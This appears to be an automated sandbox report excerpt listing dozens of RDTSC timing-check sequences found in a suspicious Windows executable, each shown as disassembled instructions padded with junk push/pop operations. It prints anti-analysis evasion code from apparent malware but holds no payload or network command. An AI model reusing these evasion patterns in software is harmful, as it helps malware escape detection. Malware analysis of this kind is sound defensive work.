Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623A3C second address: 623A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C6D second address: 623C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C79 second address: 623C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C7D second address: 623C83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C83 second address: 623CBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+1244BA99h], edi 0x0000000f or dword ptr [ebp+122D1C48h], edi 0x00000015 push 00000004h 0x00000017 or dword ptr [ebp+1244DADBh], ecx 0x0000001d nop 0x0000001e jmp 00007FCBA4817E88h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push edx 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623CBF second address: 623CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FCBA46BC736h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624337 second address: 62435E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FCBA4817E88h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62435E second address: 624363 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624363 second address: 62436D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62436D second address: 62437C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62450A second address: 624510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 624510 second address: 603BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FCBA46BC738h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call dword ptr [ebp+122D17D4h] 0x0000002c jmp 00007FCBA46BC746h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 pop esi 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 603BBA second address: 603BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 603BBE second address: 603BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 603BC6 second address: 603BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCBA4817E76h 0x0000000a jmp 00007FCBA4817E89h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 603BE9 second address: 603C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC748h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCBA46BC748h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654A12 second address: 654A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654A16 second address: 654A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 jmp 00007FCBA46BC749h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FCBA46BC736h 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654A52 second address: 654A62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FCBA4817E78h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654A62 second address: 654A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FCBA46BC736h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654C0D second address: 654C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FCBA4817E7Bh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FCBA4817E87h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654C39 second address: 654C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654C3D second address: 654C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b ja 00007FCBA4817E76h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654C4F second address: 654C69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007FCBA46BC736h 0x00000009 jns 00007FCBA46BC736h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007FCBA46BC736h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654DD4 second address: 654E22 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA4817E8Eh 0x00000008 jl 00007FCBA4817E89h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007FCBA4817E7Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62372A second address: 623751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007FCBA46BC748h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654F85 second address: 654FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FCBA4817E83h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655100 second address: 655116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC740h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65527B second address: 655281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655281 second address: 655291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FCBA46BC736h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655291 second address: 655295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6553C4 second address: 6553D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FCBA46BC736h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65C0DE second address: 65C0E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AAEB second address: 65AAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push ebx 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AC36 second address: 65AC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AC3A second address: 65AC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AC40 second address: 65AC63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FCBA4817E76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AC63 second address: 65AC7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCBA46BC736h 0x00000008 je 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AF4D second address: 65AF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AF53 second address: 65AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65AF5C second address: 65AF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B38B second address: 65B398 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B4EE second address: 65B508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 jnp 00007FCBA4817E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B640 second address: 65B672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCBA46BC740h 0x0000000a jbe 00007FCBA46BC73Ch 0x00000010 js 00007FCBA46BC736h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FCBA46BC73Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65BA9A second address: 65BA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65BF09 second address: 65BF23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC746h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65BF23 second address: 65BF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA4817E7Dh 0x0000000b popad 0x0000000c js 00007FCBA4817EA4h 0x00000012 pushad 0x00000013 jnl 00007FCBA4817E76h 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65BF48 second address: 65BF5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66344C second address: 66345B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jng 00007FCBA4817E76h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663755 second address: 663760 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BA5 second address: 663BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BAC second address: 663BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BB3 second address: 663BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BB9 second address: 663BC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BC6 second address: 663BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BCA second address: 663BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 jmp 00007FCBA46BC73Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BEB second address: 663BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663BEF second address: 663BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663179 second address: 66317D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66317D second address: 663181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663181 second address: 663199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FCBA4817E7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663E93 second address: 663E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663E98 second address: 663EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E81h 0x00000009 jmp 00007FCBA4817E84h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 663EC6 second address: 663ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6641D2 second address: 664209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FCBA4817E76h 0x0000000f jmp 00007FCBA4817E89h 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 jnc 00007FCBA4817E78h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664209 second address: 664221 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FCBA46BC73Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664221 second address: 664225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 664225 second address: 664229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66757C second address: 66758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 ja 00007FCBA4817EA9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66758C second address: 667590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 669C29 second address: 669C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66DE83 second address: 66DE89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66E2A8 second address: 66E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E88h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 jmp 00007FCBA4817E84h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jno 00007FCBA4817E76h 0x00000021 jmp 00007FCBA4817E7Bh 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6727C4 second address: 6727C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6727C8 second address: 6727F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FCBA4817E84h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6727F4 second address: 672837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA46BC744h 0x0000000e pushad 0x0000000f jmp 00007FCBA46BC747h 0x00000014 jmp 00007FCBA46BC73Bh 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671F4C second address: 671F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCBA4817E76h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671F5A second address: 671F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jp 00007FCBA46BC73Ch 0x0000000d pushad 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FCBA46BC736h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671F8E second address: 671F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676B90 second address: 676BA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FCBA46BC736h 0x00000009 js 00007FCBA46BC736h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676D23 second address: 676D2D instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676D2D second address: 676D44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007FCBA46BC736h 0x0000000d pop eax 0x0000000e pushad 0x0000000f jbe 00007FCBA46BC736h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 676D44 second address: 676D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677054 second address: 677069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCBA46BC73Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677069 second address: 677075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCBA4817E76h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 677372 second address: 677396 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC74Dh 0x00000008 jmp 00007FCBA46BC747h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ED3A second address: 67ED3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67ED3E second address: 67ED4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67F5AF second address: 67F5B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 67FB7D second address: 67FB9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC740h 0x00000009 jmp 00007FCBA46BC73Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680115 second address: 68011B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68011B second address: 680128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 680128 second address: 68012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68012C second address: 68013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCBA46BC736h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
